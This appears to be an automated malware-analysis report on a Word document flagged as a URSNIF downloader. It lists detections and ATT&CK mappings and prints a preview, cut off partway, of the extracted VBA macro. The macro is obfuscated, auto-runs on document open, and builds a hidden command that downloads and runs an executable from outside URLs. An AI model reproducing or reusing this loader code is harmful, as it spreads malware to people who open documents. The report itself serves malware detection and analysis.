Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)
The sample contains a VBA macro with a Document_Open subroutine that calls the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' further supports this behavior.
Heuristics (5)
- ClamAV: Doc.Downloader.URSNIF-6729855-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7174 bytes |

SHA-256 of macros.bas: 5f8a1c444c592edb1d2967faefed8309f0ebc55a13bce4e425c2e5a1d2288369

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "siihnQzZwrK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Second "502007906" + "3464" + "ha" + "IUlC"
Second "168363839" + "558"
Second "SLI" + "2898"
Second "6173" + "SJck" + "kIEndqMhY" + "72298554"
Second "ukACBzcO" + "wS" + "ENRG" + "381714750"
Second "cMKFizODIOQiHv" + "sAEZ" + "tpjUtAb" + "5174"
Second "1628" + "NdP"
Shell opPBiOX + NwFOZqENbLs + bjJLRqi, CStr(vbHide)
Second "qTMTmwz" + "dfPLLcSA" + "48194564" + "Id"
Second "w" + "DQtQc"
Second "XdlGGdobRNuhJY" + "7100" + "332605776" + "KnPt"
End Sub
Attribute VB_Name = "zmInYFhpNNLcd"
Function opPBiOX()
On _
Error _
Resume _
Next
Second "99780980" + "1534" + "VPI" + "2375"
Second "MSPw" + "Db"
Second "hRDJ" + "BwHp"
ozkVTiMOmw = Format(Chr(10 + 12 + 14 + 15 + 48)) + "md /V^" + ":^ON/" + Format(Chr(7 + 8 + 9 + 10 + 33)) + Format(Chr(3 + 3 + 4 + 4 + 20)) + "^s" + "^e^" + "t "
Second "XAtjHHi" + "765"
Second "8332" + "UniY" + "1463" + "7460"
Second "524424264" + "6563" + "8666" + "3888"
Second "327681727" + "260" + "GuU" + "iVY"
KcfNoKZ = "^G^2z= " + "^ ^ ^ " + "^ " + " ^ ^ " + " ^ ^ ^" + " ^ " + "^ ^" + " }}{^h"
Second "KzDiRs" + "pKHt"
Second "lFMR" + "HhENiYlQSpM" + "3576" + "5496"
Second "AiCU" + "207664372" + "9886" + "nUhJzPc"
Second "2042" + "qr" + "5109" + "37044684"
YrfwMiXVzPt = Format(Chr(10 + 12 + 14 + 15 + 48)) + "^" + "ta" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "^};^" + "k" + "^a^e" + "r" + "^b^;^p^" + "it^$"
Second "TCUDYn" + "w"
Second "IGjn" + "9906" + "RvPOGpps" + "3760"
Second "Ba" + "jD" + "364542111" + "FwfEToNj"
Second "366743752" + "981" + "9849" + "QsYV"
Second "29957626" + "JpiXEvbR"
FzcbXbWR = " ^m^etI" + "-^ek" + "^" + "ovn^" + "I;)p^i" + "t" + "$ ,KJ^L" + "$("
Second "RaBo" + "drQ" + "mapk" + "fon"
Second "k" + "278043957"
Second "182489465" + "6861" + "163322001" + "9549"
BjJXrBTfzL = "^eli" + "^F^" + "da^o" + "lnw^" + "o" + "^D" + ".^W" + "N^j^$^" + "{^yrt^{" + ")^" + "lv^j^$" + " ni^ " + "KJ^L"
Second "491129191" + "YAj" + "205078210" + "K"
Second "KPPBGzzr" + "PVdC" + "BN" + "273188467"
Second "PfASZRwnaJ" + "1452" + "bvXwK" + "300949384"
Second "iwSZtkiFqHKQ" + "4230"
Second "fXAI" + "jiqq" + "1707" + "9921"
zjOcZfboY = "^$(h" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "a" + "^er^of^" + ";'" + "^e^x" + "^e.^'^" + "+^" + "M^i^q^$" + "^+'^" + "\'^+" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "i" + "lb"
Second "2480" + "RPwsod"
Second "106283584" + "zCNJS"
Second "259140402" + "GT"
izwiaHzkGK = "u^p^:" + "vn^e$" + "=^p^it" + "^" + "$^;"
opPBiOX = ozkVTiMOmw + KcfNoKZ + YrfwMiXVzPt + FzcbXbWR + BjJXrBTfzL + zjOcZfboY + izwiaHzkGK
Second "473616217" + "1509"
Second "zffchGpT" + "jar" + "zJQ" + "lEf"
Second "LdzWj" + "pfQobarCuwSc"
Second "CMp" + "ssotNkfLcU"
End Function
Function NwFOZqENbLs()
On _
Error _
Resume _
Next
Second "150465629" + "NwiqWqMaX" + "tiJsBsISUADc" + "1121"
sPTDddBhJDX = "^'" + "^0^1^7" + "' =" + " ^Miq^$" + ";)'@^'(" + "^tilp^S" + "." + "'euUV" + "jul^Lg/" + "^51^0^2" + "4^1^0"
Second "Vi" + "250532306" + "MJr" + "240933360"
jDdpo = "^" + "2^_^kin" + "ne^izd" + "/l" + "p^." + "s^u" + "^k" + "inne^i^" + "z" + "^d^." + "^dlr^o" + "w" + "^"
Second "1742" + "63444735" + "173804911" + "5892"
Second "hUfN" + "304821651"
QBwTrjd = "lo^oh" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "^" + "s//^:^p" + "t^th@" + "^0^h^" + "s"
Second "50181086" + "mY" + "6314" + "GzhDLjNoCHNt"
Second "464247852" + "169285053" + "t" + "iwiJsGKJzmuksS"
Second "I" + "NNzqjfuT" + "cF" + "XwjD"
WhOhRD = "^6Rg^s" + "gV5/re" + "^g" + "^" + "ana^m/l" + "p^.n^" + "u" + "r-^og/" + "/:^ptt" + "^h^@H^" + "S^0^" + "2^O" + Format(Chr(10 + 12 + 14 + 15 + 48)) + "^4"
Second "hfUUrZVHEBmHi" + "2408
... (truncated)